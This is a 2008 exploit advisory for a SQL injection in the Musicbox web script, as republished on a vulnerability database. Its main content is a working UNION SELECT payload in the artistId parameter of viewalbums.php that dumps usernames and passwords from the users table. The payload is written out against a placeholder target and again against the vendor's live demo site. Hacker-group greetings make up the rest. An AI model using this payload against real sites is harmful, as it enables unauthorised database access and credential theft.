Musicbox <= 2.3.7 (artistId) Remote SQL Injection Vulnerability

2008-05-10T00:00:00
ID SSV:8415
Type seebug
Reporter Root
Modified 2008-05-10T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #########################################
#    Rem0te SQL Injection Vulnerability                           #
#       Musicbox [viewalbums.php]                                 #
########################################

[<>]Author: HaCkeR-EgY
 
[<>]H^0mE: www.pal-hacker.com ,  atsdp.com
 
[<>]CONTact: hacker_EGY@hotmail.com 
===========================================================
[<>]Script : Musicbox
 
[<>]version : Version 2.3.6 / 2.3.7
 
[<>]Script Price: Only $ 255.00
 
[<>]Download : www.musicboxv2.com
============================================================
 
[<>] D0RK : ... you know
 
[<>] ExPLO!t :
             
  ===>
http://www.target.com/version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10/**/from/**/users/*
 
 
[<>] live DemO :
            
  ===>
  http://www.musicboxv2.com/version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10/**/from/**/users/*
 
==============================================================
[<>] Thanx : MY Brotha and MY Master " Abo Mohamed "
 
[<>] Greetz : F!resell , Mohamed el Arab ,Mr.EXE , DaRk MaStEr ,H-T Team
                   Gold_M , V4 Team , Jiki Team  , RoMaNcYxHaCkEr
===============================================================

# sebug.net